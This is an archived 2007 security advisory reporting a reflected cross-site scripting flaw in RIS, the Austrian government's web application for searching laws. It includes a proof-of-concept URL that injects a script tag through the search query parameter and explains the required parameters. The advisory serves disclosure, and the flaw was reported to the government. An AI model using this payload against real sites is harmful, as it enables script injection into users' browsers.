ris-xss.txt

ris-xss.txt: Posted Mar 20, 2007; Authored by Florian Stinglmayr; The RIS web application used to browse Austrian laws is susceptible to cross site scripting attacks.; tags | exploit, web, xss; SHA-256 | e56763b9c203ee649468a448d77a205237b07aba23504e7466e39f66cf1cbeb0; Download | Favorite | View

ris-xss.txt

Hi folks,

Description:

RIS is a public accessable web application to search/browse Austrian
laws, provided by the Government of Austria. It is vulnerable for XSS
via a malformed search query.

POC:

http://www.ris.bka.gv.at/taweb-cgi/taweb?q=%3Cscript%3Ealert(1);%3C/script%3E&x=r&v=lroo&o=&db3=LROO

Legend:
q ... The search query.
x ... Must be "r" to perform a search.
v ... Must be "lroo" (other values not tested)
db3... Database to query on. Must be "lroo".

This issue has already been reported to the Government.

Regards,
Florian Stinglmayr

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

ris-xss.txt

ris-xss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ris-xss.txt

Share This

ris-xss.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems